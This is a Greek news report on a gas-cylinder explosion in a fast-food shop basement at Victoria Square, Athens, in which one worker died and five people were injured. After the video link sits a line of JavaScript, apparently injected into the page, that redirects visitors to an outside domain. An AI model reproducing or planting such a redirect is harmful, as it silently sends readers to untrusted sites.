Μία νεκρή και 5 τραυματίες από έκρηξη στην Πλατεία Βικτωρίας (BINTEO)

0
3

 

Μία γυναίκα 42 ετών είναι η νεκρή που ανασύρθηκε από το υπόγειο του καταστήματος ταχυφαγείου όπου σημειώθηκε η έκρηξη πιθανόν από διαρροή από φιάλη υγραερίου στην Πλατεία Βικτωρίας στη συμβολή με τη Χέυδεν, το πρωί, λίγο στις 09.25.

Πανικός προκλήθηκε ανάμεσα στο πλήθος ενώ η περιοχή αποκλείστηκε αμέσως από αστυνομικές δυνάμεις.Από την ισχυρή έκρηξη προκλήθηκαν ζημιές σε διπλανά καταστήματα και σπίτια που βρίσκονται στην περιοχή, καθώς και σε σταθμευμένα αυτοκίνητα και μοτοσικλέτες.

Στο σημείο επιχείρησαν 35 πυροσβέστες με 15 οχήματα, που κατάφεραν ώρα αργότερα να κατασβήσουν την πυρκαγιά που προκλήθηκε από την έκρηξη στο υπόγειο του ταχυφαγείου. Σύμφωνα με το ΕΚΑΒ, συνολικώς πέντε τραυματίες έχουν μεταφερθεί στο Γενικό Κρατικό Νοσοκομείο Αθηνών «Γ. Γεννηματάς» και το 401.

 Λίγη ώρα αφότου οι πυροσβέστες κατόρθωσαν να σβήσουν τη φωτιά, εντόπισαν νεκρή στο υπόγειο την άτυχη γυναίκα. Σύμφωνα με τις πρώτες πληροφορίες, η νεκρή ήταν εργαζόμενη του καταστήματος.

https://www.youtube.com/watch?v=DIeBXLg8d6w setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here